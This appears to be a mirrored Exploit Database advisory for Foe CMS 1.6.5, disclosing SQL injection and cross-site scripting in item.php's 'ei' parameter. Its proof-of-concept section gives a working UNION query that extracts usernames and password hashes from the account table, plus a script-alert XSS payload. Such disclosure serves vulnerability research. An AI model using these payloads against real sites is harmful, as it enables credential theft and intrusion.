Foe CMS 1.6.5 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： flux77
  日期： 2013-04-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/25088/

• Title: Foe CMS 1.6.5 SQL Injection Vulnerability 
  Vendor: http://foecms.com/
  Download: http://code.google.com/p/foecms/downloads/list
  Versions: 1.6.5
  Platform: linux, windows
  Bug: SQL Injection | Cross Site Scripting
  
  
  
  -------------------------------------------------------
  
  1) Introduction
  2) Bug
  3) Proof of concept
  4) Credits
  
  
  ===========
  1) Introduction
  ===========
  
  Gestor de categorias (Como phpbb3)
  Pasar a php orientado a objetos
  account_meta para firma, ocupacion, avatar, etc (como wordpress) permite añadir y quitar campos a gusto
  Permisos segun rangos para TODO
  Pagina del UCP para cambiar los permisos de acceso (amigos y eso)
  
  
  ======
  2) Bug
  ======
  
  SQL Injection
  http://victim/[path]/item.php?ei=[SQLi]
  
  Cross Site Scripting
  http://victim/[path]/item.php?ei=[XSS]
  
  
  =====
  3)proof of concept
  =====
  
  Example SQLi
  http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--
  
  Example XSS
  http://victim/[path]/item.php?ei=<script>alert(1)</script>
  
  
  =====
  4)Credits
  =====
  
  flux77
  Contact : 0xflux77 at gmail.com